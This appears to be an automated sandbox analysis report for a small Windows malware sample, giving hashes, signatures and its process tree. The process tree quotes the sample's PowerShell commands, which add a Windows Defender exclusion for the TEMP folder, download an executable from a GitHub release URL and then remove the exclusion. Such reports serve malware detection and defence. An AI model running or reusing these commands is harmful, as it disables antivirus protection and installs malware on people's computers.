Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22/03/2025, 02:40
Behavioral task
behavioral1
Sample
ZGZ3X_nig.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ZGZ3X_nig.exe
Resource
win10v2004-20250314-en
General
-
Target
ZGZ3X_nig.exe
-
Size
57KB
-
MD5
16edd47bf01716b24958a0b3a3a7bcfb
-
SHA1
8b7972f4190c2ca9d600084611e966fa0f899b98
-
SHA256
568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
-
SHA512
9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
-
SSDEEP
768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/
Malware Config
Signatures
-
pid Process 2228 powershell.exe 2892 powershell.exe -
resource yara_rule behavioral1/memory/2280-0-0x0000000140000000-0x0000000140028000-memory.dmp upx behavioral1/memory/2280-28-0x0000000140000000-0x0000000140028000-memory.dmp upx -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process 2228 powershell.exe 2696 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2228 powershell.exe 2892 powershell.exe 2696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2228 powershell.exe Token: SeDebugPrivilege 2892 powershell.exe Token: SeDebugPrivilege 2696 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2280 wrote to memory of 1072 2280 ZGZ3X_nig.exe 29 PID 2280 wrote to memory of 1072 2280 ZGZ3X_nig.exe 29 PID 2280 wrote to memory of 1072 2280 ZGZ3X_nig.exe 29 PID 1072 wrote to memory of 2964 1072 cmd.exe 30 PID 1072 wrote to memory of 2964 1072 cmd.exe 30 PID 1072 wrote to memory of 2964 1072 cmd.exe 30 PID 2964 wrote to memory of 2692 2964 net.exe 31 PID 2964 wrote to memory of 2692 2964 net.exe 31 PID 2964 wrote to memory of 2692 2964 net.exe 31 PID 1072 wrote to memory of 2228 1072 cmd.exe 32 PID 1072 wrote to memory of 2228 1072 cmd.exe 32 PID 1072 wrote to memory of 2228 1072 cmd.exe 32 PID 1072 wrote to memory of 2892 1072 cmd.exe 33 PID 1072 wrote to memory of 2892 1072 cmd.exe 33 PID 1072 wrote to memory of 2892 1072 cmd.exe 33 PID 1072 wrote to memory of 2696 1072 cmd.exe 34 PID 1072 wrote to memory of 2696 1072 cmd.exe 34 PID 1072 wrote to memory of 2696 1072 cmd.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:2692
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51c935ef28fdfd394b770d945d7f04d76
SHA129e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fe5f201dd0f9a8151fa364aea81014fd
SHA1c367b7eb2dd29016eb555cc5985a4c320e06bbdf
SHA256b18e13a950f0a58b6acf293ab5f8528e7106253ba81a100ceeca062c3797a980
SHA51260eb5d358b318e1c7e44c82aa501e767cd45a3010f704604377f9909be3d8b95fcde56297fb8e20793fe10609b79c5a5ee5d9cc3f588b85239a70ddc59842aac